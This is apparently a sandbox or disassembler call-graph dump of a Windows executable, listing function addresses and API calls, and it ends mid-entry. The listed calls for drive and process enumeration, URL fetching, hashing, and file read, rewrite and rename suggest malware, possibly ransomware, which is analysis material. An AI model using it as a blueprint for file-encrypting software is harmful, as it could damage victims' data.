43105->43107 43355 412de0 43105->43355 43108 41b1c9 43107->43108 43362 412c40 43108->43362 43110 41b1d8 43369 412bf0 43110->43369 43114 41b1f3 43115 41b2f5 43114->43115 43121 412c40 59 API calls 43114->43121 43124 412900 60 API calls 43114->43124 43126 413580 59 API calls 43114->43126 43130 413100 59 API calls 43114->43130 43533 40f1f0 59 API calls 43114->43533 43380 4136c0 43115->43380 43119 41b311 43396 4130b0 43119->43396 43121->43114 43124->43114 43125 41b327 43423 4111c0 CreateFileW 43125->43423 43126->43114 43128 41b33b 43508 41ba10 LoadCursorW RegisterClassExW 43128->43508 43130->43114 43131 41b343 43509 41ba80 CreateWindowExW 43131->43509 43133 41b34b 43133->43006 43512 410a50 GetLogicalDrives 43133->43512 43136 41b379 43137 413100 59 API calls 43136->43137 43138 41b3a5 43137->43138 43139 413580 59 API calls 43138->43139 43162 41b3b3 43139->43162 43140 41b48b 43523 41fdc0 CreateThread 43140->43523 43142 41b49f GetMessageW 43143 41b4ed 43142->43143 43144 41b4bf 43142->43144 43147 41b502 PostThreadMessageW 43143->43147 43148 41b55b 43143->43148 43145 41b4c5 TranslateMessage DispatchMessageW GetMessageW 43144->43145 43145->43143 43145->43145 43146 41c330 59 API calls 43146->43162 43149 41b510 PeekMessageW 43147->43149 43150 41b564 PostThreadMessageW 43148->43150 43151 41b5bb 43148->43151 43152 41b546 WaitForSingleObject 43149->43152 43153 41b526 DispatchMessageW PeekMessageW 43149->43153 43154 41b570 PeekMessageW 43150->43154 43151->43006 43155 41b5d2 CloseHandle 43151->43155 43152->43148 43152->43149 43153->43152 43153->43153 43156 41b5a6 WaitForSingleObject 43154->43156 43157 41b586 DispatchMessageW PeekMessageW 43154->43157 43155->43006 43156->43151 43156->43154 43157->43156 43157->43157 43158 41c240 59 API calls 43158->43162 43159 41b8b0 59 API calls 43159->43162 43160 413260 59 API calls 43160->43162 43162->43140 43162->43146 43162->43158 43162->43159 43162->43160 43522 41fa10 CreateThread 43162->43522 43163->42801 43164->42805 43165->42812 43169->42828 43170->42831 43171->42837 43172->42839 43173->42843 43174->42844 43175->42851 43176->42855 43177->42852 43179 428b1b EnterCriticalSection 43178->43179 43180 428b08 43178->43180 43179->42859 43188 428b9f 43180->43188 43182 428b0e 43182->43179 43212 427c2e 58 API calls 3 library calls 43182->43212 43185->42871 43186->42872 43187->42863 43189 428bab __setmbcp 43188->43189 43190 428bb4 43189->43190 43191 428bcc 43189->43191 43213 427f51 58 API calls 2 library calls 43190->43213 43194 428bed __setmbcp 43191->43194 43216 428cde 58 API calls 2 library calls 43191->43216 43194->43182 43195 428bb9 43214 427fae 58 API calls 7 library calls 43195->43214 43196 428be1 43198 428bf7 43196->43198 43199 428be8 43196->43199 43202 428af7 __lock 58 API calls 43198->43202 43201 425208 __setmbcp 58 API calls 43199->43201 43200 428bc0 43215 427b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 43200->43215 43201->43194 43204 428bfe 43202->43204 43206 428c23 43204->43206 43207 428c0b 43204->43207 43218 420bed 58 API calls 2 library calls 43206->43218 43217 43263e InitializeCriticalSectionAndSpinCount 43207->43217 43210 428c17 43219 428c3f LeaveCriticalSection _doexit 43210->43219 43213->43195 43214->43200 43216->43196 43217->43210 43218->43210 43219->43194 43220->42880 43221->42882 43222->42895 43223->42890 43224->42890 43225->42898 43227 43aeb8 EncodePointer 43226->43227 43227->43227 43228 43aed2 43227->43228 43228->42902 43229->42904 43231 40cf32 _memset __write_nolock 43230->43231 43232 40cf4f InternetOpenW 43231->43232 43233 415c10 59 API calls 43232->43233 43234 40cf8a InternetOpenUrlW 43233->43234 43235 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 43234->43235 43243 40cfb2 43234->43243 43536 4156d0 43235->43536 43237 40d000 43238 4156d0 59 API calls 43237->43238 43239 40d049 43238->43239 43239->43243 43555 413010 59 API calls 43239->43555 43241 40d084 43241->43243 43556 413010 59 API calls 43241->43556 43243->42908 43245 413ab2 43244->43245 43252 413ad0 GetModuleFileNameW PathRemoveFileSpecW 43244->43252 43246 413b00 43245->43246 43247 413aba 43245->43247 43559 44f23e 59 API calls 2 library calls 43246->43559 43248 423b4c 59 API calls 43247->43248 43250 413ac7 43248->43250 43250->43252 43560 44f1bb 59 API calls 3 library calls 43250->43560 43254 418400 43252->43254 43255 418437 43254->43255 43259 418446 43254->43259 43255->43259 43561 415d50 59 API calls ___crtGetEnvironmentStringsW 43255->43561 43256 4184b9 43256->42933 43259->43256 43562 418d50 59 API calls 43259->43562 43563 431781 43260->43563 43264 42f7c0 __write_nolock 43263->43264 43265 41222d 7 API calls 43264->43265 43266 4122bd K32EnumProcesses 43265->43266 43267 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 43265->43267 43268 4122d3 43266->43268 43269 4122df 43266->43269 43267->43266 43268->42936 43270 412353 43269->43270 43271 4122f0 OpenProcess 43269->43271 43270->42936 43272 412346 CloseHandle 43271->43272 43273 41230a K32EnumProcessModules 43271->43273 43272->43270 43272->43271 43273->43272 43274 41231c K32GetModuleBaseNameW 43273->43274 43579 420235 43274->43579 43276 41233e 43276->43272 43277 412345 43276->43277 43277->43272 43279 420c62 _malloc 58 API calls 43278->43279 43282 40ef6e _memset 43279->43282 43280 40efdc 43280->42941 43281 420c62 _malloc 58 API calls 43281->43282 43282->43280 43282->43281 43282->43282 43284 413f05 43283->43284 43290 413eae 43283->43290 43285 413fb1 43284->43285 43286 413f18 43284->43286 43594 44f23e 59 API calls 2 library calls 43285->43594 43288 413fbb 43286->43288 43289 413f2d 43286->43289 43292 413f3d ___crtGetEnvironmentStringsW 43286->43292 43595 44f23e 59 API calls 2 library calls 43288->43595 43289->43292 43593 416760 59 API calls 2 library calls 43289->43593 43290->43284 43295 413ed4 43290->43295 43292->42941 43297 413ed9 43295->43297 43298 413eef 43295->43298 43591 413da0 59 API calls ___crtGetEnvironmentStringsW 43297->43591 43592 413da0 59 API calls ___crtGetEnvironmentStringsW 43298->43592 43302 413ee9 43302->42941 43303 413eff 43303->42941 43596 40e670 43304->43596 43306 40e79e 43307 413ea0 59 API calls 43306->43307 43308 40e7c3 43307->43308 43309 413ff0 59 API calls 43308->43309 43310 40e7ff 43309->43310 43622 40e870 43310->43622 43312 40e806 43313 413ff0 59 API calls 43312->43313 43314 40e80d 43312->43314 43313->43314 43314->43001 43896 413c40 43315->43896 43317 41288c WideCharToMultiByte 43906 4184e0 43317->43906 43319 4128cf 43319->43009 43321 41102b CryptCreateHash 43320->43321 43322 41101a 43320->43322 43324 411045 43321->43324 43325 411056 lstrlenA CryptHashData 43321->43325 43917 430eca RaiseException 43322->43917 43918 430eca RaiseException 43324->43918 43327 41107f CryptGetHashParam 43325->43327 43328 41106e 43325->43328 43330 41109f 43327->43330 43332 4110b0 _memset 43327->43332 43919 430eca RaiseException 43328->43919 43920 430eca RaiseException 43330->43920 43333 4110cf CryptGetHashParam 43332->43333 43334 4110f5 43333->43334 43335 4110e4 43333->43335 43337 420c62 _malloc 58 API calls 43334->43337 43921 430eca RaiseException 43335->43921 43339 411105 _memset 43337->43339 43338 411148 43341 41114e CryptDestroyHash CryptReleaseContext 43338->43341 43339->43338 43340 4204a6 _sprintf 83 API calls 43339->43340 43342 411133 lstrcatA 43340->43342 43341->43011 43342->43338 43342->43339 43344 413a90 59 API calls 43343->43344 43345 41294c MultiByteToWideChar 43344->43345 43346 418400 59 API calls 43345->43346 43347 41298d 43346->43347 43347->43030 43349 413591 43348->43349 43350 4135d6 43348->43350 43349->43350 43351 413597 43349->43351 43354 4135b7 43350->43354 43923 414f70 59 API calls 43350->43923 43351->43354 43922 414f70 59 API calls 43351->43922 43354->43049 43356 412dec 43355->43356 43358 412dfa 43355->43358 43357 413ea0 59 API calls 43356->43357 43359 412df5 43357->43359 43358->43358 43360 413ea0 59 API calls 43358->43360 43359->43105 43361 412e11 43360->43361 43361->43105 43363 412c71 43362->43363 43364 412c5f 43362->43364 43367 4156d0 59 API calls 43363->43367 43365 4156d0 59 API calls 43364->43365 43366 412c6a 43365->43366 43366->43110 43368 412c8a 43367->43368 43368->43110 43370 413ff0 59 API calls 43369->43370 43371 412c13 43370->43371 43372 40ecb0 43371->43372 43374 40ece5 43372->43374 43375 40eefc 43374->43375 43924 421b3b 59 API calls 3 library calls 43374->43924 43375->43114 43376 4156d0 59 API calls 43379 40ed6b _memmove 43376->43379 43377 415230 59 API calls 43377->43379 43379->43375 43379->43376 43379->43377 43925 421b3b 59 API calls 3 library calls 43379->43925 43381 4136e7 43380->43381 43382 413742 43380->43382 43381->43382 43383 4136ed 43381->43383 43386 41370d 43382->43386 43927 414f70 59 API calls 43382->43927 43383->43386 43926 414f70 59 API calls 43383->43926 43385 41377f 43389 40ca70 43385->43389 43386->43385 43388 414690 59 API calls 43386->43388 43388->43385 43390 40cb64 43389->43390 43394 40caa3 43389->43394 43390->43119 43391 40cb6b 43928 44f26c 59 API calls 3 library calls 43391->43928 43393 40cb75 43393->43119 43394->43390 43394->43391 43395 4136c0 59 API calls 43394->43395 43395->43394 43397 414690 59 API calls 43396->43397 43398 4130d4 43397->43398 43399 40c740 43398->43399 43929 420fdd 43399->43929 43402 40c944 CreateDirectoryW 43404 420fdd 115 API calls 43402->43404 43410 40c960 43404->43410 43405 40c90e 43405->43402 43414 40c96a 43405->43414 43406 40c906 43952 423a38 43406->43952 43408 40c9d5 43966 4228fd 82 API calls 6 library calls 43408->43966 43410->43408 43410->43414 43965 4228fd 82 API calls 6 library calls 43410->43965 43412 40c9ed 43967 4228fd 82 API calls 6 library calls 43412->43967 43413 420546 58 API calls 43422 40c79e _memmove 43413->43422 43414->43125 43417 40c9f8 43419 423a38 __fcloseall 83 API calls 43417->43419 43418 415c10 59 API calls 43418->43422 43420 40c9fe 43419->43420 43420->43414 43421 414f70 59 API calls 43421->43422 43422->43406 43422->43413 43422->43418 43422->43421 43939 421101 43422->43939 43424 411223 GetFileSizeEx 43423->43424 43425 411287 43423->43425 43426 4112a3 VirtualAlloc 43424->43426 43427 411234 43424->43427 43425->43128 43429 41131a CloseHandle 43426->43429 43434 4112c0 _memset 43426->43434 43427->43426 43428 41123c CloseHandle 43427->43428 43430 413100 59 API calls 43428->43430 43429->43128 43431 411253 43430->43431 44387 4159d0 43431->44387 43433 4113a7 43436 4113b7 SetFilePointer 43433->43436 43434->43433 43435 4112e9 SetFilePointerEx 43434->43435 43438 411332 ReadFile 43435->43438 43439 41130c VirtualFree 43435->43439 43440 4113f5 ReadFile 43436->43440 43503 4115ae 43436->43503 43437 41126a MoveFileW 43437->43425 43438->43439 43441 41134f 43438->43441 43439->43429 43442 411440 43440->43442 43443 41140f VirtualFree CloseHandle 43440->43443 43441->43439 43445 411356 43441->43445 43448 411471 lstrlenA 43442->43448 43449 411718 lstrlenA 43442->43449 43442->43503 43446 41142f 43443->43446 43444 4115c5 SetFilePointerEx 43444->43443 43447 4115df 43444->43447 43445->43436 43452 412c40 59 API calls 43445->43452 43446->43128 43450 4115ed WriteFile 43447->43450 43454 411602 43447->43454 44413 420be4 43448->44413 44465 420be4 43449->44465 43450->43443 43450->43454 43458 411364 43452->43458 43455 4130b0 59 API calls 43454->43455 43456 411631 43455->43456 43460 412840 60 API calls 43456->43460 43458->43433 43468 411379 VirtualFree CloseHandle 43458->43468 43463 41163c WriteFile 43460->43463 43471 411658 43463->43471 43472 411396 43468->43472 43471->43443 43473 411660 lstrlenA WriteFile 43471->43473 43472->43128 43473->43443 43475 411686 CloseHandle 43473->43475 43476 413100 59 API calls 43475->43476 43477 4116a3 43476->43477 43478 4159d0 59 API calls 43477->43478 43480 4116be MoveFileW 43478->43480 43483 4116e4 VirtualFree 43480->43483 43486 4118a7 43480->43486 43487 4116fc 43483->43487 43490 4118e3 43486->43490 43491 4118d5 VirtualFree 43486->43491 43487->43128 43490->43425 43492 4118e8 CloseHandle 43490->43492 43491->43490 43492->43425 43503->43444 43508->43131 43510 41bab9 43509->43510 43511 41babb ShowWindow UpdateWindow 43509->43511 43510->43133 43511->43133 43515 410a81 43512->43515 43513 410bb4 43513->43136 43514 4156d0 59 API calls 43514->43515 43515->43513 43515->43514 43516 413ea0 59 API calls 43515->43516 43519 413ff0 59 API calls 43515->43519 43520 412900 60 API calls 43515->43520 43521 413580 59 API calls 43515->43521 43517 410ae0 SetErrorMode PathFileExistsA SetErrorMode 43516->43517 43517->43515 43518 410b0c GetDriveTypeA 43517->43518 43518->43515 43519->43515 43520->43515 43521->43515 43522->43162 44556 41f130 timeGetTime 43522->44556 43523->43142 44732 41fd80 43523->44732 43524->42915 43526 411ad0 43525->43526 43527 411af4 43525->43527 43528 411afc 43526->43528 43529 411adc DispatchMessageW PeekMessageW 43526->43529 43527->42959 43528->42959 43529->43526 43529->43527 43530->42979 43531->42961 43532->43103 43533->43114 43537 415735 43536->43537 43538 4156de 43536->43538 43539 4157bc 43537->43539 43540 41573e 43537->43540 43538->43537 43547 415704 43538->43547 43558 44f23e 59 API calls 2 library calls 43539->43558 43545 415750 ___crtGetEnvironmentStringsW 43540->43545 43557 416760 59 API calls 2 library calls 43540->43557 43545->43237 43549 415709 43547->43549 43550 41571f 43547->43550 43551 413ff0 59 API calls 43549->43551 43552 413ff0 59 API calls 43550->43552 43554 415719 43551->43554 43553 41572f 43552->43553 43553->43237 43554->43237 43555->43241 43556->43243 43557->43545 43561->43259 43562->43259 43566 431570 43563->43566 43567 431580 43566->43567 43568 431586 43567->43568 43573 4315ae 43567->43573 43569 425208 __setmbcp 58 API calls 43568->43569 43570 43158b 43569->43570 43577 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43570->43577 43575 4315cf wcstoxq 43573->43575 43578 42e883 GetStringTypeW 43573->43578 43574 425208 __setmbcp 58 API calls 43576 41a36e lstrcpyW lstrcpyW 43574->43576 43575->43574 43575->43576 43576->42951 43577->43576 43578->43573 43580 420241 43579->43580 43581 4202b6 43579->43581 43584 425208 __setmbcp 58 API calls 43580->43584 43588 420266 43580->43588 43590 4202c8 60 API calls 4 library calls 43581->43590 43583 4202c3 43583->43276 43585 42024d 43584->43585 43589 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43585->43589 43587 420258 43587->43276 43588->43276 43589->43587 43590->43583 43591->43302 43592->43303 43593->43292 43597 420c62 _malloc 58 API calls 43596->43597 43598 40e684 43597->43598 43599 420c62 _malloc 58 API calls 43598->43599 43600 40e690 43599->43600 43601 40e6b4 GetAdaptersInfo 43600->43601 43602 40e699 43600->43602 43603 40e6c4 43601->43603 43604 40e6db GetAdaptersInfo 43601->43604 43605 421f2d _wprintf 85 API calls 43602->43605 43675 420bed 58 API calls 2 library calls 43603->43675 43607 40e741 43604->43607 43608 40e6ea 43604->43608 43609 40e6a3 43605->43609 43676 420bed 58 API calls 2 library calls 43607->43676 43646 4204a6 43608->43646 43674 420bed 58 API calls 2 library calls 43609->43674 43610 40e6ca 43614 420c62 _malloc 58 API calls 43610->43614 43618 40e6d2 43614->43618 43616 40e6a9 43616->43306 43617 40e74a 43617->43306 43618->43602 43618->43604 43620 40e737 43621 421f2d _wprintf 85 API calls 43620->43621 43621->43607 43623 4156d0 59 API calls 43622->43623 43624 40e8bb CryptAcquireContextW 43623->43624 43625 40e8d8 43624->43625 43626 40e8e9 CryptCreateHash 43624->43626 43891 430eca RaiseException 43625->43891 43628 40e903 43626->43628 43629 40e914 CryptHashData 43626->43629 43892 430eca RaiseException 43628->43892 43630 40e932 43629->43630 43631 40e943 CryptGetHashParam 43629->43631 43893 430eca RaiseException 43630->43893 43634 40e963 43631->43634 43636 40e974 _memset 43631->43636 43894 430eca RaiseException 43634->43894 43637 40e993 CryptGetHashParam 43636->43637 43638 40e9a8 43637->43638 43645 40e9b9 43637->43645 43895 430eca RaiseException 43638->43895 43640 40ea10 43642 40ea16 CryptDestroyHash CryptReleaseContext 43640->43642 43641 4204a6 _sprintf 83 API calls 43641->43645 43643 40ea33 43642->43643 43643->43312 43644 413ea0 59 API calls 43644->43645 43645->43640 43645->43641 43645->43644 43645->43645 43647 4204c2 43646->43647 43648 4204d7 43646->43648 43649 425208 __setmbcp 58 API calls 43647->43649 43648->43647 43650 4204de 43648->43650 43651 4204c7 43649->43651 43678 426ab6 43650->43678 43677 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43651->43677 43654 420504 43655 40e725 43654->43655 43702 4264ef 78 API calls 7 library calls 43654->43702 43657 421f2d 43655->43657 43658 421f39 __setmbcp 43657->43658 43659 421f4a 43658->43659 43660 421f5f _wprintf 43658->43660 43661 425208 __setmbcp 58 API calls 43659->43661 43739 420e92 43660->43739 43662 421f4f 43661->43662 43755 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43662->43755 43665 421f5a __setmbcp 43665->43620 43666 421f6f _wprintf 43744 42afd2 43666->43744 43668 421f82 _wprintf 43669 426ab6 __output_l 83 API calls 43668->43669 43670 421f9b _wprintf 43669->43670 43751 42afa1 43670->43751 43674->43616 43675->43610 43676->43617 43677->43655 43703 42019c 43678->43703 43681 425208 __setmbcp 58 API calls 43682 426b30 43681->43682 43683 427601 43682->43683 43692 426b50 __aulldvrm __woutput_s_l _strlen 43682->43692 43718 42816b 43682->43718 43684 425208 __setmbcp 58 API calls 43683->43684 43685 427606 43684->43685 43728 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43685->43728 43688 4275db 43711 42a77e 43688->43711 43690 4275fd 43690->43654 43692->43683 43692->43688 43693 42766a 78 API calls __output_l 43692->43693 43694 4271b9 DecodePointer 43692->43694 43697 42721c DecodePointer 43692->43697 43698 4276de 78 API calls _write_string 43692->43698 43699 427241 DecodePointer 43692->43699 43700 43adf7 60 API calls __cftof 43692->43700 43701 4276b2 78 API calls _write_multi_char 43692->43701 43725 422bcc 58 API calls _LocaleUpdate::_LocaleUpdate 43692->43725 43726 428cde 58 API calls 2 library calls 43692->43726 43727 420bed 58 API calls 2 library calls 43692->43727 43693->43692 43694->43692 43697->43692 43698->43692 43699->43692 43700->43692 43701->43692 43702->43655 43704 4201ad 43703->43704 43705 4201fa 43703->43705 43729 425007 43704->43729 43705->43681 43707 4201b3 43708 4201da 43707->43708 43734 4245dc 58 API calls 5 library calls 43707->43734 43708->43705 43735 42495e 58 API calls 4 library calls 43708->43735 43712 42a786 43711->43712 43713 42a788 IsProcessorFeaturePresent 43711->43713 43712->43690 43715 42ab9c 43713->43715 43737 42ab4b 5 API calls ___raise_securityfailure 43715->43737 43717 42ac7f 43717->43690 43719 428175 43718->43719 43720 42818a 43718->43720 43721 425208 __setmbcp 58 API calls 43719->43721 43720->43692 43722 42817a 43721->43722 43738 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43722->43738 43724 428185 43724->43692 43725->43692 43726->43692 43727->43692 43728->43688 43730 42501f __getptd_noexit 58 API calls 43729->43730 43731 42500d 43730->43731 43732 42501a 43731->43732 43736 427c2e 58 API calls 3 library calls 43731->43736 43732->43707 43734->43708 43735->43705 43737->43717 43738->43724 43740 420eb3 EnterCriticalSection 43739->43740 43741 420e9d 43739->43741 43740->43666 43742 428af7 __lock 58 API calls 43741->43742 43743 420ea6 43742->43743 43743->43666 43745 42816b __filbuf 58 API calls 43744->43745 43746 42afdf 43745->43746 43757 4389c2 43746->43757 43748 42afe5 _wprintf 43749 42b034 43748->43749 43766 428cde 58 API calls 2 library calls 43748->43766 43749->43668 43752 421faf 43751->43752 43753 42afaa 43751->43753 43756 421fc9 LeaveCriticalSection LeaveCriticalSection _wprintf __getstream 43752->43756 43753->43752 43768 42836b 43753->43768 43755->43665 43756->43665 43758 4389da 43757->43758 43759 4389cd 43757->43759 43761 425208 __setmbcp 58 API calls 43758->43761 43762 4389e6 43758->43762 43760 425208 __setmbcp 58 API calls 43759->43760 43764 4389d2 43760->43764 43763 438a07 43761->43763 43762->43748 43767 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43763->43767 43764->43748 43766->43749 43767->43764 43769 42837e 43768->43769 43773 4283a2 43768->43773 43770 42816b __filbuf 58 API calls 43769->43770 43769->43773 43771 42839b 43770->43771 43774 42df14 43771->43774 43773->43752 43775 42df20 __setmbcp 43774->43775 43776 42df44 43775->43776 43777 42df2d 43775->43777 43778 42dfe3 43776->43778 43780 42df58 43776->43780 43874 4251d4 58 API calls __getptd_noexit 43777->43874 43878 4251d4 58 API calls __getptd_noexit 43778->43878 43783 42df80 43780->43783 43784 42df76 43780->43784 43782 42df32 43785 425208 __setmbcp 58 API calls 43782->43785 43802 43b134 43783->43802 43875 4251d4 58 API calls __getptd_noexit 43784->43875 43799 42df39 __setmbcp 43785->43799 43788 42df7b 43790 425208 __setmbcp 58 API calls 43788->43790 43789 42df86 43791 42df99 43789->43791 43792 42dfac 43789->43792 43793 42dfef 43790->43793 43811 42e003 43791->43811 43796 425208 __setmbcp 58 API calls 43792->43796 43879 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43793->43879 43798 42dfb1 43796->43798 43797 42dfa5 43877 42dfdb LeaveCriticalSection __unlock_fhandle 43797->43877 43876 4251d4 58 API calls __getptd_noexit 43798->43876 43799->43773 43804 43b140 __setmbcp 43802->43804 43803 43b18f EnterCriticalSection 43805 43b1b5 __setmbcp 43803->43805 43804->43803 43806 428af7 __lock 58 API calls 43804->43806 43805->43789 43807 43b165 43806->43807 43808 43b17d 43807->43808 43880 43263e InitializeCriticalSectionAndSpinCount 43807->43880 43881 43b1b9 LeaveCriticalSection _doexit 43808->43881 43812 42e010 __write_nolock 43811->43812 43813 42e06e 43812->43813 43814 42e04f 43812->43814 43847 42e044 43812->43847 43819 42e0c6 43813->43819 43820 42e0aa 43813->43820 43882 4251d4 58 API calls __getptd_noexit 43814->43882 43815 42a77e _GetLocaleNameFromDefault 6 API calls 43817 42e864 43815->43817 43817->43797 43818 42e054 43822 425208 __setmbcp 58 API calls 43818->43822 43823 42e0df 43819->43823 43886 42f744 60 API calls 3 library calls 43819->43886 43884 4251d4 58 API calls __getptd_noexit 43820->43884 43825 42e05b 43822->43825 43827 4389c2 __flswbuf 58 API calls 43823->43827 43824 42e0af 43828 425208 __setmbcp 58 API calls 43824->43828 43883 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43825->43883 43830 42e0ed 43827->43830 43831 42e0b6 43828->43831 43832 42e446 43830->43832 43836 425007 __setmbcp 58 API calls 43830->43836 43885 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43831->43885 43833 42e464 43832->43833 43834 42e7d9 WriteFile 43832->43834 43837 42e588 43833->43837 43845 42e47a 43833->43845 43838 42e439 GetLastError 43834->43838 43862 42e678 43834->43862 43839 42e119 GetConsoleMode 43836->43839 43841 42e593 43837->43841 43842 42e67d 43837->43842 43849 42e406 43838->43849 43839->43832 43843 42e158 43839->43843 43840 42e812 43840->43847 43848 425208 __setmbcp 58 API calls 43840->43848 43841->43840 43855 42e5f8 WriteFile 43841->43855 43842->43840 43854 42e6f2 WideCharToMultiByte 43842->43854 43843->43832 43844 42e168 GetConsoleCP 43843->43844 43844->43840 43871 42e197 43844->43871 43845->43840 43846 42e4e9 WriteFile 43845->43846 43845->43849 43846->43838 43846->43845 43847->43815 43850 42e840 43848->43850 43849->43840 43849->43847 43851 42e566 43849->43851 43890 4251d4 58 API calls __getptd_noexit 43850->43890 43852 42e571 43851->43852 43853 42e809 43851->43853 43857 425208 __setmbcp 58 API calls 43852->43857 43889 4251e7 58 API calls 3 library calls 43853->43889 43854->43838 43867 42e739 43854->43867 43855->43838 43859 42e647 43855->43859 43860 42e576 43857->43860 43859->43841 43859->43849 43859->43862 43888 4251d4 58 API calls __getptd_noexit 43860->43888 43861 42e741 WriteFile 43865 42e794 GetLastError 43861->43865 43861->43867 43862->43849 43865->43867 43866 43c76c 60 API calls __fgetwc_nolock 43866->43871 43867->43842 43867->43849 43867->43861 43867->43862 43868 44058c WriteConsoleW CreateFileW __putwch_nolock 43872 42e2ed 43868->43872 43869 42e280 WideCharToMultiByte 43869->43849 43870 42e2bb WriteFile 43869->43870 43870->43838 43870->43872 43871->43849 43871->43866 43871->43869 43871->43872 43887 422d33 58 API calls __isleadbyte_l 43871->43887 43872->43838 43872->43849 43872->43868 43872->43871 43873 42e315 WriteFile 43872->43873 43873->43838 43873->43872 43874->43782 43875->43788 43876->43797 43877->43799 43878->43788 43879->43799 43880->43808 43881->43803 43882->43818 43883->43847 43884->43824 43885->43847 43886->43823 43887->43871 43888->43847 43889->43847 43890->43847 43891->43626 43892->43629 43893->43631 43894->43636 43895->43645 43897 413c62 43896->43897 43904 413c74 _memset 43896->43904 43898 413c67 43897->43898 43899 413c96 43897->43899 43901 423b4c 59 API calls 43898->43901 43913 44f23e 59 API calls 2 library calls 43899->43913 43902 413c6d 43901->43902 43902->43904 43914 44f1bb 59 API calls 3 library calls 43902->43914 43904->43317 43907 418513 43906->43907 43912 418520 43906->43912 43907->43912 43915 415810 59 API calls ___crtGetEnvironmentStringsW 43907->43915 43909 418619 43909->43319 43910 44f23e 59 API calls 43910->43912 43912->43909 43912->43910 43916 416760 59 API calls 2 library calls 43912->43916 43915->43912 43916->43912 43917->43321 43918->43325 43919->43327 43920->43332 43921->43334 43922->43354 43923->43354 43924->43379 43925->43379 43926->43386 43927->43386 43928->43393 43968 421037 43929->43968 43931 40c78a 43931->43405 43932 420546 43931->43932 43933 420550 43932->43933 43934 420564 43932->43934 43935 425208 __setmbcp 58 API calls 43933->43935 43934->43422 43936 420555 43935->43936 44169 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43936->44169 43938 420560 43938->43422 43940 42110d __setmbcp 43939->43940 43941 42111e 43940->43941 43943 42114c 43940->43943 43942 425208 __setmbcp 58 API calls 43941->43942 43944 421123 43942->43944 43948 42112e __setmbcp 43943->43948 44170 420e53 43943->44170 44215 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43944->44215 43947 42117d 44216 4211b5 LeaveCriticalSection LeaveCriticalSection _ungetc 43947->44216 43948->43422 43951 42115b 43951->43947 44176 429312 43951->44176 43953 423a44 __setmbcp 43952->43953 43954 423a70 43953->43954 43955 423a58 43953->43955 43957 420e53 __lock_file 59 API calls 43954->43957 43961 423a68 __setmbcp 43954->43961 43956 425208 __setmbcp 58 API calls 43955->43956 43958 423a5d 43956->43958 43959 423a82 43957->43959 44381 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43958->44381 44365 4239cc 43959->44365 43961->43405 43965->43410 43966->43412 43967->43417 43971 421043 __setmbcp 43968->43971 43969 421056 43970 425208 __setmbcp 58 API calls 43969->43970 43973 42105b 43970->43973 43971->43969 43972 421087 43971->43972 43987 428df4 43972->43987 44017 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43973->44017 43976 42108c 43977 4210a2 43976->43977 43978 421095 43976->43978 43980 4210cc 43977->43980 43981 4210ac 43977->43981 43979 425208 __setmbcp 58 API calls 43978->43979 43986 421066 @_EH4_CallFilterFunc@8 __setmbcp 43979->43986 44002 428f13 43980->44002 43982 425208 __setmbcp 58 API calls 43981->43982 43982->43986 43986->43931 43988 428e00 __setmbcp 43987->43988 43989 428af7 __lock 58 API calls 43988->43989 43990 428e0e 43989->43990 43991 428e89 43990->43991 43995 428b9f __mtinitlocknum 58 API calls 43990->43995 43996 420e92 __getstream 59 API calls 43990->43996 44000 428e82 43990->44000 44022 420efc LeaveCriticalSection LeaveCriticalSection _doexit 43990->44022 44023 428cde 58 API calls 2 library calls 43991->44023 43994 428e90 43994->44000 44024 43263e InitializeCriticalSectionAndSpinCount 43994->44024 43995->43990 43996->43990 43997 428eff __setmbcp 43997->43976 43999 428eb6 EnterCriticalSection 43999->44000 44019 428f0a 44000->44019 44003 428f33 __wsetlocale_nolock 44002->44003 44004 428f4d 44003->44004 44016 429108 44003->44016 44030 43c232 60 API calls 3 library calls 44003->44030 44005 425208 __setmbcp 58 API calls 44004->44005 44006 428f52 44005->44006 44029 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44006->44029 44008 42916b 44026 43c214 44008->44026 44010 4210d7 44018 4210f9 LeaveCriticalSection LeaveCriticalSection _ungetc 44010->44018 44012 429101 44012->44016 44031 43c232 60 API calls 3 library calls 44012->44031 44014 429120 44014->44016 44032 43c232 60 API calls 3 library calls 44014->44032 44016->44004 44016->44008 44017->43986 44018->43986 44025 428c81 LeaveCriticalSection 44019->44025 44021 428f11 44021->43997 44022->43990 44023->43994 44024->43999 44025->44021 44033 43b9f8 44026->44033 44028 43c22d 44028->44010 44029->44010 44030->44012 44031->44014 44032->44016 44035 43ba04 __setmbcp 44033->44035 44034 43ba1a 44036 425208 __setmbcp 58 API calls 44034->44036 44035->44034 44037 43ba50 44035->44037 44038 43ba1f 44036->44038 44044 43bac1 44037->44044 44116 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44038->44116 44043 43ba29 __setmbcp 44043->44028 44045 43bae1 44044->44045 44118 447f50 44045->44118 44047 43bc34 44164 4242fd 8 API calls 2 library calls 44047->44164 44049 43bafd 44049->44047 44051 43bb37 44049->44051 44056 43bb5a 44049->44056 44050 43c213 44149 4251d4 58 API calls __getptd_noexit 44051->44149 44053 43bb3c 44054 425208 __setmbcp 58 API calls 44053->44054 44055 43bb49 44054->44055 44150 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44055->44150 44057 43bc18 44056->44057 44065 43bbf6 44056->44065 44151 4251d4 58 API calls __getptd_noexit 44057->44151 44060 43ba6c 44117 43ba95 LeaveCriticalSection __unlock_fhandle 44060->44117 44061 43bc1d 44062 425208 __setmbcp 58 API calls 44061->44062 44063 43bc2a 44062->44063 44152 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44063->44152 44125 43b1c2 44065->44125 44067 43bcc4 44068 